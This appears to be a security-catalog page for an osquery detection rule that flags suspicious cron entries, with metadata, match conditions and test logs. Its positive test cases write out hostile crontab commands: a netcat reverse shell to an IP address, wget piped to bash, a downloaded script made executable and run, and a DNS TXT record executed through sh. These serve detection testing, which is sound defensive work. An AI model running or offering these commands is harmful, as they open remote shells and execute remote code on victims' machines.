MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Execution | T1053 Scheduled Task/Job |
Rule body yaml
AnalysisType: rule
Filename: osquery_suspicious_cron.py
RuleID: "Osquery.SuspiciousCron"
DisplayName: "Suspicious cron detected"
Enabled: true
LogTypes:
- Osquery.Differential
Tags:
- Osquery
- Execution:Scheduled Task/Job
Reports:
MITRE ATT&CK:
- TA0002:T1053
Severity: High
Description: A suspicious cron has been added
Runbook: Analyze the command to ensure no nefarious activity is occurring
Reference: https://en.wikipedia.org/wiki/Cron
SummaryAttributes:
- action
- hostIdentifier
- name
Tests:
- Name: Netcat Listener
ExpectedResult: true
Log:
{
"name": "pack_incident-response_crontab",
"hostIdentifier": "test-host",
"action": "added",
"columns":
{
"event": "",
"minute": "17",
"hour": "*",
"day_of_month": "*",
"month": "*",
"day_of_week": "7",
"command": "nc -e /bin/bash 237.233.242.58 80",
"path": "/etc/crontab",
},
}
- Name: Wget Pipe Bash
ExpectedResult: true
Log:
{
"name": "pack_incident-response_crontab",
"action": "added",
"hostIdentifier": "test-host",
"columns":
{
"event": "",
"minute": "17",
"hour": "*",
"day_of_month": "*",
"month": "*",
"day_of_week": "7",
"command": "wget -qO- -U- https://sd9fd8f9d8fe.io/i.sh|bash >/dev/null 2>&1",
"path": "/etc/crontab",
},
}
- Name: Wget Execute
ExpectedResult: true
Log:
{
"name": "pack_incident-response_crontab",
"action": "added",
"hostIdentifier": "test-host",
"columns":
{
"event": "",
"minute": "17",
"hour": "*",
"day_of_month": "*",
"month": "*",
"day_of_week": "7",
"command": "wget -O /tmp/load.sh http://test[.]io/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log",
"path": "/etc/crontab",
},
}
- Name: Dig
ExpectedResult: true
Log:
{
"name": "pack_incident-response_crontab",
"action": "added",
"hostIdentifier": "test-host",
"columns":
{
"event": "",
"minute": "17",
"hour": "*",
"day_of_month": "*",
"month": "*",
"day_of_week": "7",
"command": '/bin/sh -c "sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)"',
"path": "/etc/crontab",
},
}
- Name: Built-in Cron
ExpectedResult: false
Log:
{
"name": "pack_incident-response_crontab",
"action": "added",
"hostIdentifier": "test-host",
"columns":
{
"event": "",
"minute": "17",
"hour": "*",
"day_of_month": "*",
"month": "*",
"day_of_week": "7",
"command": "root cd / && run-parts --report /etc/cron.hourly",
"path": "/etc/crontab",
},
}
- Name: Command with quotes
ExpectedResult: false
Log:
{
"name": "pack_incident-response_crontab",
"action": "added",
"hostIdentifier": "test-host",
"columns":
{
"event": "",
"minute": "17",
"hour": "*",
"day_of_month": "*",
"month": "*",
"day_of_week": "7",
"command": "runit 'go fast'",
"path": "/etc/crontab",
},
}
Detection logic
Condition
name contains "crontab"
columns.command is_not_null
columns.command wildcard "*|*sh" or columns.command wildcard "*sh -c *"
This rule also runs imperative logic the parser cannot express as a filter; the conditions above are the structured part it could extract.
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
columns.command | is_not_null | |
columns.command | wildcard |
|
name | contains |
|
Output fields
Fields the rule emits when it matches. Chronicle authors list these in the outcome block; they appear on the detection and $risk_score drives alerting. Sentinel / Defender XDR rules build them up through project / summarize / extend stages. Sentinel maps these into alert fields via entityMappings and customDetails; Defender XDR custom detections surface them as alert fields directly.
| Field |
|---|
hostIdentifier |